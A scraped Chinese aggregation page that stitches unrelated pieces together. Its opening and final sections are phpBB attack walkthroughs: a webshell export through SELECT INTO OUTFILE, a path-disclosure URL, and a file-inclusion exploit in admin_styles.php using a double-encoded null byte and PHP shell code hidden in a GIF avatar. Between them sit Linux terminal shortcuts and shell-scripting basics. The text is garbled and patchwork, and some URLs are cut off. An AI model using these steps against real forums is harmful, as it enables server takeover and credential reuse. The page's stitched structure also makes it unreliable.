      至此就顺利得到了Webshell,就是操作上有点繁琐。接下来怎么玩就是你自己的事了,嘿嘿……喜欢的话就上传大马什么的,然后提权……由于我本机架设的PHP环境没有做权限设置,是可以直接执行系统命令的。这种办法麻烦了点,而且要求的权限的也非常特殊,倘若论坛使用的并不是root权限的用户,不可以调用“SELECT 表段名 INTO OUTFILE”,将无法成功导出Webshell。还有一个就是要得到绝对路径,这个倒是好办,直接在论坛访问地址后面加上db/oracle.php,回车即可暴出论坛的绝对路径,如图8。
      图8
      这是利用了PHPBB的另一个暴绝对路径的漏洞。至于其它更完美的在后台得到Webshell的办法,由于本人技术十分有限,研究数天也没有找到太通用的拿Webshell方法,实在是美中不足!如有任何问题请到X官方论坛发帖共同探讨。
      (文章中涉及到的工具PHPBB漏洞利用工具、phpbb_db_backup.sql、ASP+PHP两用Shell已经收录在光盘中)
      小编点评:
      PHPBB在国内的用户还是比较多的,台湾同胞也有很大一部分用户使用该套论坛程序。这次暴出的这个漏洞可谓是相当严重了,可惜只针对MOD的版本才有效!拿到利用工具的时候小编测试了一下,发现许多论坛还是可以成功利用的!可惜后台拿Webshell的方法始终不够完美,因为局限性都非常大。不过要是结合社会工程学尝试用得到的密码登录FTP、远程终端、SSH什么的,或许也会有意外的收获哦!
    展开全文
  • Linux + Shell bash / sh / ksh / csh / tcsh

    千次阅读 2010-09-09 11:50:00
    None

    Redhat Gnome Terminal 快捷键

    http://huangchao200701.javaeye.com/blog/263002

     

     

    常用
    win+n切换背景颜色风格
    alt+tab=不用说了。
    win+tab若开3D效果了切换
    ctrl+alt+backspace=相当于强制注销
    ctrl+alt+del=调出关机菜单
    ctrl+alt+l=锁定桌面

    ctrl+alt+d=最小化gnome所有窗口
    ctrl+alt+f2=linux终端用户(alt + f7返回xwindows,alt+ <- 或-> 进行终端切换)
    ctrl+alt+ <- 或-> =切换桌面

    终端快捷键
    tab=补全
    ctrl+a=开始位置
    ctrl+e=最后位置
    ctrl+k=删除此处至末尾所有内容
    ctrl+u=删除此处至开始所有内容
    ctrl+d=删除当前字母
    ctrl+w=删除此处到左边的单词
    ctrl+y=粘贴由ctrl+u,ctrl+d,ctrl+w删除的单词
    ctrl+r=正在测试,还没弄明白,呵呵。
    ctrl+l=相当于clear
    ctrl+b=向回移动
    ctrl+f=向前移动
    ctrl+p=向上显示缓存命令
    ctrl+n=向下显示缓存命令
    ctrl+d=关闭终端
    shift+上或下=终端上下滚动
    shift+pgup或pgdown=终端上下翻页滚动
    ctrl+shift+f=全屏(仅限于konsole)
    ctrl+shift+n=新终端(terminal 和konsole有所不同)
    ctrl+c=终止

    以下为网上的快捷键列表

    打开主菜单 = Alt + F1
    运行 = Alt + F2
    显示桌面 = Ctrl + Alt + d
    最小化当前窗口 = Alt + F9
    最大化当前窗口 = Alt + F10
    关闭当前窗口 = Alt + F4
    截取全屏 = Print Screen
    截取窗口 = Alt + Print Screen

    默认特殊快捷键
    展示所有窗口程序 = F10
    展示当前窗口最上层程序 = F11
    展示当前窗口所有程序 = F12
    切换窗口 = Alt + Tab
    旋转3D桌面 = Ctrl + Alt + 左/右箭头(也可以把鼠标放在标题栏或桌面使用滚轮切换)
    旋转3D桌面(活动窗口跟随) = Ctrl + Shift + Alt + 左/右箭头
    手动旋转3D桌面 = Ctrl + Alt + 左键单击并拖拽桌面空白处
    窗口透明/不透明 = possible with the “transset” utility or Alt + 滚轮
    放大一次 = 超级键 + 右击
    手动放大 = 超级键 + 滚轮向上
    手动缩小 = 超级键 + 滚轮向下
    移动窗口 = Alt + 左键单击
    移动窗口时贴住边框 = 左键开始拖动后再 Ctrl + Alt
    调整窗口大小 = Alt + 中击
    Bring up the window below the top window = Alt + middle-click
    动态效果减速 = Shift + F10
    水纹 = 按住 Ctrl+超级键
    雨点 = Shift-F9
    桌面展开= Ctrl + Alt + 下箭头,然后按住 Ctrl + Alt 和左/右箭头选择桌面

     

    shell

    http://baike.baidu.com/view/849.htm

    在计算机科学中,Shell俗称壳(用来区别于核),是指“提供使用者使用界面”的软件(命令解析器)。

    它类似于DOS下的command.com。

    它接收用户命令,然后调用相应的应用程序。

    同时它又是一种程序设计语言。

    作为命令语言,它交互式解释和执行用户输入的命令或者自动地解释和执行预先设定好的一连串的命令;

    作为程序设计语言,它定义了各种变量和参数,并提供了许多在高阶语言中才具有的控制结构,包括循环和分支。

    在C++中,Shell是希尔排序的名称。

    基本上shell分两大类:

    一:图形界面shell(Graphical User Interface shell 即 GUI shell)

    Windows Explorer

    X windows manger (BlackBox和FluxBox)和CDE、GNOME、KD、 XFCE等

    二:命令行式 shell(Command Line Interface shell ,即CLI shell)

    『Unix/linux 系统』bash / sh / ksh / csh / tcsh

          Bourne shell (包括 sh, ksh, and bash)

      Bourne shell ( sh)
    Korn shell ( ksh)
    Bourne Again shell ( bash)
    POSIX shell ( sh)
    C shell (包括 csh and tcsh)
    C shell ( csh)
    TENEX/TOPS C shell ( tcsh)
    Bourne Shell

    各主要操作系统下缺省的shell:

    AIX 下是Korn Shell.

    SolarisFreeBSD 缺省的是Bourne shell.
    HP-UX 缺省的是POSIX shell.
    Linux 是Bourne Again shell.

    『MS-DOS 系统』COMMAND.COM

    『Windows NT 系统』 cmd.exe

    『支援 .NET Framework 技术的 Windows NT 系统』Windows PowerShell

    Shell也是一个VB函数,它的作用是运行程序,语法是Shell(命令字符串[,窗口类型])

    Linux shell 编程系列

    http://www.ibm.com/developerworks/cn/linux/shell/index.html#firstmajorhead

    Shell 介绍
    Bash
    awk
    sed
    Vi、Emacs
    Shell 使用技巧

    Shell 变量

    HISTFILESIZE 与 HISTSIZE 的区别

    http://www.linuxeden.com/forum/viewthread.php?tid=159573

    两个变量和命令的 history 记录有关.

    HISTFILESIZE 定义了在 .bash_history 中保存命令的记录总数.
    HISTSIZE 定义了 history 命令输出的记录数.
    HISTTIMEFORMAT 则定义了执行命令的时间格式, 典型的配置 是 '<%F %T>: '
    改变量生效后, history 的输出将格式化为:

    1052  <2007-10-08 10:13:02>: history

    其中   <2007-10-08 10:13:02> 是 history 命令的执行时间.

     

    /etc/profile、~/.bash_profile等几个文件的执行过程

    http://blog.chinaunix.net/u2/61187/showart_1189840.html
    执行顺序为:

    /etc/profile -> (~/.bash_profile | ~/.bash_login | ~/.profile) -> ~/.bashrc ->          /etc/bashrc -> ~/.bash_logout

     

    开发人员行走Unix的随身四艺

    http://weiruan85.javaeye.com/blog/333202

    VI+文本处理+Bash Shell 编程+Make or AutoMake


    附录A:我的VI易忘命令手册
    上下左右:
    ctrl+u/d 上下半屏,ctrl+f/b,上下一屏
    H/G屏幕头/文章末 ,0/$ 行首行末

    增删改:
    yy/dd 复制/删除 一行,p/P:将yy/dd的内容paste出来
    I/A 在行首/末添加, o/O 开新行,d0/d$ 删除到行首,行末
    u:undo

    查:
    ? 向前查找, n/N 重复上一次查找

    附录B: 文本处理命令小结
    awk:处理结构化的文本(每行以固定符号分成若干列),提取打印某些字段,如:
    ls -l|awk '{print $1}'  --将ls-l结果的第一列打印出来
    awk -F":" '{print $1"  "$6}' /etc/passwd ,将以:分割的/etc/passwd文件的第1,6列打印出来,中间以空格分开
    详见IBM DW中国的AWK实例(共3篇) 或 Bash新手指南中文版第6章。

    grep:过滤,大家用得最多的命令,支持正则表达式。参数有: http://www.hudong.com/wiki/grep
    -i忽略大小写,-n显示line number,-c 统计在每个文件的出现次数,-l只显示符合的文件的名字。

    grep (global search regular expression(RE) and print out the line,全面搜索正则表达式并把行打印出来)


    sed:流编辑器,主要用于替换,如:
    sed -e '1,10s/foo/bar/g' myfile2.txt 将1到10行的文本中的foo 替换成bar,s代表替换,g代表全局替换
    支持正则的替换字符串,可以只替换某个范围内的内容。
    用法不算简单,详见IBM DW中国的Sed实例(共3篇)或 Bash新手指南中文版第5章。

    sort:排序,参数有:
    -r逆序, -n 数字比较 , -M 日历比较 Feb,Dec, -f 忽略大小写
    同样支持结构化文件,如
    sort -t : -k 1,1 /etc/passwd,以: 分割,只按第1列排序
    sort -t : -k 1,1 -k2.2,3.4 /etc/passwd ,以:分割,先按第1列排序,再按第2列的第二个字符到第3列的第4个字符排序。

    uniq:去除重复行。
    除了正常用法外,还有-c统计重复次数,和-u (唯一)和 -d (重复)两个参数,只显示唯一的和重复的行。

    wc: 统计。
    -l 行,-m 字符,-w 单词


    附录C: 我的automake1.9步骤小结
    先编写MakeFile.am
    运行autoscan,生成configure.scan
    修改configure.scan,同时把文件改名为configure.in :
    去除AC_CONFIG_HEADER([config.h])那行
    加入AM_INIT_AUTOMAKE([1.9 foreign])  (其中1.9是automake的版本号)
    加入AC_PROG_LIBTOOL  (如果用libtool的话)
    检查AC_CONFIG_FILES,如果之前没有先写齐所有MakeFile.am,autoscan就不会帮你加入,需要自己手工补充。
    libtoolize (如果用libtool的话)
    aclocal
    autoconf
    automake --add-missing
    ./configure
    make

    大家需要编写的文件从Makefile转为了Makefile.am 和configure.in, ACE的Examples是很好的参考。

     

     

    vi入门

    https://www6.software.ibm.com/developerworks/cn/education/linux/l-vi/tutorial/index.html

    shell脚本自动重新启动已停止/僵死的Apache的httpd进程

    http://community.itbbs.cn/showthread.php?t=12955

    http://bash.cyberciti.biz/web-server/restart-apache2-httpd-shell-script/

    [PPT,PDF] Bash Shell 编程基础

    http://www.openbsdonly.org/download/file.php?id=67

    http://bbs.chinaunix.net/viewthread.php?tid=994745

     

    http://wiki.ubuntu.org.cn/Shell编程基础

    http://www.linuxsir.org/main/doc/abs/abs3.7cnhtm/index.html

    Shell编程基础

    出自Ubuntu中文

    本文作者:Leal

    授权许可:

    编辑人员:FireHare, Dbzhang800

    目录

    [隐藏 ]

    <script type="text/javascript"><!-- --></script>

    [编辑 ] 基本格式

    我们可以使用任意一种文字编辑器,比如nedit、kedit、emacs、vi等来编写shell脚本,它必须以如下行开始(必须放在文件的第一行):

    # !/bin/sh

    ...

    符号#!用来告诉系统执行该脚本的程序,本例使用/bin/sh。编辑结束并保存后,如果要执行该脚本,必须先使其可执行:

    chmod +x filename

    此后在该脚本所在目录下,输入 ./filename 即可执行该脚本。

    [编辑 ] 合理使用注释

    shell 脚本中以# 开始的行表示注释,直到该行的结束。我们强烈建议你在脚本中进行适当/合理的注释,这样一来,即便你在相当长时间内没有使用该脚本,也能在短时间内就明白它的作用和工作原理。此外,还有一个很重要的原因是,在注释的帮助下,别人可以快速有效的分享你的脚本,并提出自己的意见和改进。

     

    Linux Shell注释符号 >>># 或 !

     

    man

    http://www.lovetech.cn/2007/05/1.html

     

    ubuntu 完美man

    1.添加库函数手册
    ubuntu默认是没有安装c语言的库函数man手册的,所以你在man perror 和sendto之类的函数时会显示没有相关文档的问题,这个问题让我郁闷了我好久。解决方法:
    sudo apt-get install manpages-dev

    2.让man显示中文
    ubuntu源里面已经包含了中文的man包,所以不用从其他地方down了,直接
    sudo apt-get install manpages-zh
    但是这样man默认显示的还不是中文,还需要以下两步
    a.把中文man包转换成utf8格式的
    新建一个脚本文件
    gedit t.sh
    把下面内容添加进去
    #!/bin/bash

    cd /usr/share/man/zh_CN/
    for k in *
    do
    cd $k
    for i in *.gz
    do
    j=`echo ${i%.gz}`
    gunzip $i
    iconv -f gb18030 -t utf8 $j >tmp
    mv tmp $j
    gzip $j
    done
    cd ..
    done
    然后
    sudo ./t
    b.修改man默认的语言
    sudo gedit /etc/manpath.config
    把里面的所有的 /usr/share/man 改成 /usr/share/man/zh_CN
    保存后退出,然后你再试一下man ls

    3.让没有中文帮助的显示英文
    做完上面第二部还不够,这时你再man 一下一些c语言函数(不要用printf,socket之类比较有名的函数,这些已经有中文帮助了)的时候就会发现竟然没有帮助,而刚才明明在第一步已经安装了啊。这是因为你上面
    把/usr/share/man 改成 /usr/share/man/zh_CN的操作使man只在中文帮助中搜索,如果没有就直接放弃,因此还需要以下操作,才能让man在没有中文帮助的时候自动显示英文的帮助,如果英文的也没有,哪就真的没有了。
    sudo gedit /etc/manpath.config
    然后搜索你刚才改过的地方,然后在其后面添加同样的一行,只是后面的目录还用原来的
    /usr/share/man,比如在修改后的
    MANPATH_MAP /bin /usr/share/man/zh_CN
    再添加一行
    MANPATH_MAP /bin /usr/share/man

    参考:
    http://csf.swfc.edu.cn/phpbb/viewtopic.php?p=6684

    再多唠叨一句:man显示的函数只有枯燥的用法,看起来不是很爽,在此推荐一个查c语言函数的网站
    http://www.cplusplus.com/ ,上面有每个函数的用法以及实例。

    展开全文
  • 一、Path Disclosure 漏洞文件:/db/oracle.php漏洞描叙:直接访问oracle.php,导致暴露web路径涉及版本:phpbb 测试:ie提交http://127.0.0.1/phpBB2/db/oracle.php 返回错误:Fatal error: Cannot redeclare sql_...
     

    一、Path Disclosure

    漏洞文件:/db/oracle.php
    漏洞描叙:直接访问oracle.php,导致暴露web路径
    涉及版本:phpbb <=2.013

    测试:ie提交http://127.0.0.1/phpBB2/db/oracle.php 返回错误:

    Fatal error: Cannot redeclare sql_nextid() in f:/easyphp1-7/www/phpbb2/db/oracle.php on line 405
     

    解决办法

    如果你不是采用的oracle数据库,可以直接把oracle.php删除
    修改php.ini设置: display_errors = Off
    二、Remote php File Include

    漏洞文件:/admin/admin_styles.php
    漏洞描叙:admin_styles.php文件里变量过滤不严,导致从后台执行恶意代码,从而危险服务器安全
    涉及版本:phpbb <=2.013+ php <5.0

    漏洞分析:

    71 case "addnew":
    72 $install_to = ( isset($HTTP_GET_VARS['install_to']) ) ? urldecode($HTTP_GET_VARS['install_to']) : $HTTP_POST_VARS['install_to'];
    73 $style_name = ( isset($HTTP_GET_VARS['style']) ) ? urldecode($HTTP_GET_VARS['style']) : $HTTP_POST_VARS['style'];
    74
    75 if( isset($install_to) )
    76 {
    77
    78 include($phpbb_root_path. "templates/" . $install_to . "/theme_info.cfg");
    79
    80 $template_name = $$install_to;
    81 $found = FALSE;
     

    $install_to变量过滤不严,导致被include($phpbb_root_path. "templates/" . $install_to . "/theme_info.cfg");调用,入侵者可以通过构造 $install_to达到攻击
    目的

    测试分析(目的:从后台得到webshelll):

    首先我们只看78行代码

    78 include($phpbb_root_path. "templates/" . $install_to . "/theme_info.cfg");
     

    include最终于是执行了theme_info.cfg文件,theme_info.cfg是保存“风格”的一些设置 如果我们可以在从在theme_info.cfg文件插入恶意代码,那么就直接通过include执行了我们的代码 :) [思路参考《从后台到webshell的一点思路》]我们来测试下:

    后台风格管理-->管理选项--->编辑-->CSS 风格表 输入";phpinfo();" (也可以是其他变量插入),然后“输出”设置成功保存到theme_info.cfg文件

    我们在打开theme_info.cfg看看:

    $subSilver[0]['head_stylesheet'] = "subSilver.css/";phpinfo();/"";
     

    郁闷"被过滤了,我是在 magic_quotes_gpc = off 下测试的 看来phpbb本身对做了过滤 ,此路不通 :(

    在对于<5.0(不包括4.10)的php本身存在对null截断的漏洞

    ------------------------------- 漏洞具体描叙 start -------------------------------
    PHP存在输入验证漏洞,远程攻击者可以利用这个漏洞读取系统文件内容及进行目录遍历攻击。

    问题一是addslashes()存在问题,addslashes()用于过滤用户输入,在magic_quotes_gpc设置"on"时,将对每个输入执行addslashes()进行过滤,但是由于NULL字节不正确被addslashes()编码,如果用户输入被include()或require()使用,可能导致攻击者读取文件系统的任意文件。

    问题二是上传路径遍历问题,PHP自动过滤上传的文件名数据,删除在斜杠或反斜杠之前的数据,但是如果攻击者上传的文件包含单引号,而WEB服务又设置magic_quotes为ON,或者对上传文件名执行addslashes()操作,那么在单引号前会前缀一个反斜杠,因此在Windows系统可造成目录遍历问题,导致文件上传到系统任意目录中。

    POC:

    代码:

    $whatever = addslashes($_REQUEST['whatever']);
    include("/path/to/program/" . $whatever . "/header.htm");
    ?>
     

    恶意攻击者可以提交如下URL获得文件内容:

    http://localhost/phpscrip......ver=../../../../boot.ini%00
     

    ------------------------------- 漏洞具体描叙 end -------------------------------

    下面我们回到phpbb 首先我们测试下%00,提交:

    http://127.0.0.1/phpBB2/a......6eb9ea1e43e62cbd634
     

    得到错误:

    Warning: main(./../templates/theme_info.cfg/0/theme_info.cfg): failed to open stream: No such file or directory in f:/easyphp1-7/www/phpbb2/admin/admin_styles.php on line 78

    Warning: main(): Failed opening './../templates/theme_info.cfg/0/theme_info.cfg' for inclusion (include_path='.;f:/EasyPHP1-7/php/pear/') in f:/easyphp1-7/www/phpbb2/admin/admin_styles.php on line 7
     

    %00变从了/0,phpbb就是变态,既然%00不行 我们在看到72行代码:

    72 $install_to = ( isset($HTTP_GET_VARS['install_to']) ) ? urldecode($HTTP_GET_VARS['install_to']) : $HTTP_POST_VARS['install_to'];
     

    我们使用ie提交的方式是get 那么我们提交的&install_to,要被urldecode()解析,那么我们可以先把%00进行url编码一次:%25%30%30 提交:

    http://127.0.0.1/phpBB2/a......6eb9ea1e43e62cbd634
     

    返回:

    Warning: main(./../templates/theme_info.cfg): failed to open stream: No such file or directory in f:/easyphp1-7/www/phpbb2/admin/admin_styles.php on line 78

    Warning: main(): Failed opening './../templates/theme_info.cfg' for inclusion (include_path='.;f:/EasyPHP1-7/php/pear/') in f:/easyphp1-7/www/phpbb2/admin/admin_styles.php on line 7
     

    注意和%00时比较

    %00     ---> main(./../templates/theme_info.cfg/0/theme_info.cfg)
    %25%30%30 ---> Warning: main(./../templates/theme_info.cfg)
     

    哈哈 include成功被截断,那么我们可以利用../来调用容易文件咯 :)


    具体利用

    我们把phpshell代码保存为gif或其他图片格式,在通过论坛上传 然后利用构造 install_to 而被 include() 调用并执行。

    这里phpshell代码代码使用 保存为 1.gif 我们到 http://127.0.0.1/phpBB2/profile.php?mode=editprofile 上传图像

    返回错误:The avatar filetype must be .jpg, .gif or .png

    如图1

    大家都晓得图片文件都有他的“特殊标志” ,用uedit等编辑工具你就可以发现如 gif 文件的开头有“GIF89a” 看来phpbb在判断后缀后还用了 getimagesize() 或类似的函数判断,那么我们怎么绕过去呢?注意gif的文件尾部有个“0000...”的空数据区,我们就可以把php代码写到这个里面。

    如图2

    我们在上传这个修改了的 1.gif 文件上传! 呵呵上传成功,我们在察看你个人的资料察看原代码你就可以看到你上传后的文件为:images/avatars/109064250b9ce7ec7f.gif

    如图3 ,接下来就是去构造 &install_to ,让 include 包含我们上传的images/avatars/109064250b9ce7ec7f.gif 从而执行我们的代码 :)

    提交:

    http://127.0.0.1/phpBB2/a......ea1e43e62cbd634

    哈哈~ 成功返回phpinfo

    展开全文
  • phpbb3 后台拿shell

    2019-06-20 15:53:58
    又不能上传个SHELL。确实很头疼啊 搜半天都没搜到有牛人拿到过。难道没人研究它? 去年就试过些招。还是没搞定。今天遇到个phpbb3。终于还是拿到shell了。。。 要是能找到执行类似phpmyadmin之类的执行数据库语句...
  • commix注入工具

    千次阅读 2018-12-07 14:29:45
    commix简介 commix是一款由python编写,开源自动化检测系统命令注入工具 ... commix 参数 选项: -v VERBOSE详细程度级别(0-1,默认值:0)。 --version 显示版本号并退出。... --output-dir=.....
  • 渗透之——Metasploit命令及模块

    千次阅读 2019-01-26 10:26:29
    show exploits 列出metasploit框架中的所有渗透攻击模块。 show payloads 列出metasploit框架中的所有攻击载荷。 show auxiliary 列出metasploit框架中的所有辅助攻击载荷。 search name 查找metasploit框架中所有的...
  • linux apache web站点配置详解

    万次阅读 2014-06-20 22:38:53
    linux apache web站点配置详解 注意:请先在"安全性及防火墙设置"打开对www服务的访问 httpd的配置文件为/etc/httpd/conf/httpd.conf 试修改以下指令: 1. Web站点的主目录 ...注:如果更改主目
  • commix工具配合命令注入

    千次阅读 2019-08-27 16:52:51
    commix简介 commix是一款由python编写,开源自动化检测系统命令注入工具https://github.com/commixproject/commix commix参数 选项: ... -v VERBOSE详细程度级别(0-1,默认值:0)。... ...
  • 漏洞扫描工具nikto使用心得

    千次阅读 2009-06-26 09:29:00
    #http://www.cirt.net/ 官方网站# site http://www.feelids.com*/# Author:swap简单扫描 目标基本WEB基本配制信息,服务器,PHP解析器等版本信息perl nkito.pl –h 192.168.0.1多端口扫描Perl nikto.pl –h 192....
  • 黑客入侵技术学习大纲

    千次阅读 2006-05-31 12:59:00
    来源:网络常用网络命令及工具介绍 阿D网络工具包 常用网络命令:ipconfig,net user,net use,net start,net stop,net view,net time,at,netstat,ping,tracert pstools工具包的利用(pslist.exe,pskill,psexec) ...
  • 最好的FireFox扩展

    千次阅读 2005-06-29 21:30:00
    Best Firefox ExtensionsThis is an attempt to list the best extensions for the Mozilla Firefox web browser. Extensions are mostly available from update.mozilla.org. KillerAdBlock makes a huge differe
  • SQL Injection基础知识_03

    千次阅读 2020-02-01 13:33:53
    文章目录SQL自动化注入GET方法注入POST方法注入提权操作综合实例 SQL自动化注入 SQL注入比较好用的工具,首推开源工具SQLmap。SQLmap是一个国内外著名的安全稳定性测试工具,可以用来进行自动化检测,利用SQL注入...
  • php包含漏洞收集程序代码 php包含漏洞收集程序代码 No Comments|安全,他山之石,PHP| bycalms|418 Views.| 2013-09-06, 6:14 PM php包含(lfi)漏洞收集程序代码...index2.php?includes_dir=Shellfor...
  • metasploit命令及模块

    千次阅读 2019-01-10 14:55:32
    show exploits 列出metasploit框架中的所有渗透攻击模块。 show payloads 列出metasploit框架中的所有攻击载荷。 show auxiliary 列出metasploit框架中的所有辅助攻击载荷。 search name 查找metasploit框架中所有的...
  • SQL注入语句大全

    万次阅读 2013-08-23 13:52:40
    1.判断有无注入点 ; and 1=1 and 1=2 2.猜表一般的表的名称无非是admin adminuser user pass password 等.. and 0and 0 3.猜帐号数目 如果遇到0and 0and 1 4.猜解字段名称 在len( ) 括号里面加上我们想到的字段名称....
  • ssh secure shell 脚本语句大全

    千次阅读 2013-12-24 11:07:48
    Linux SSH命令大全 rm -rf mydir /* 删除mydir目录 */ cd mydir /* 进入mydir目录 */ cd – /* 回上一级目录 */ cd ~ /* 回根目录 */ mv tools tool /* 把tools目录改名为tool */ ln -s tool bac ...
  • 转自:http://www.oracle.com/technetwork/cn/testcontent/vaswani-zend-154971-zhs.html 开发人员:PHP 使用 Zend Server 和 Oracle Database 11 g 构建企业级 PHP 系统 作者:Vikram Vaswani ...
1 2 3 4 5 ... 20
收藏数 563
精华内容 225
关键字:

phpbb shell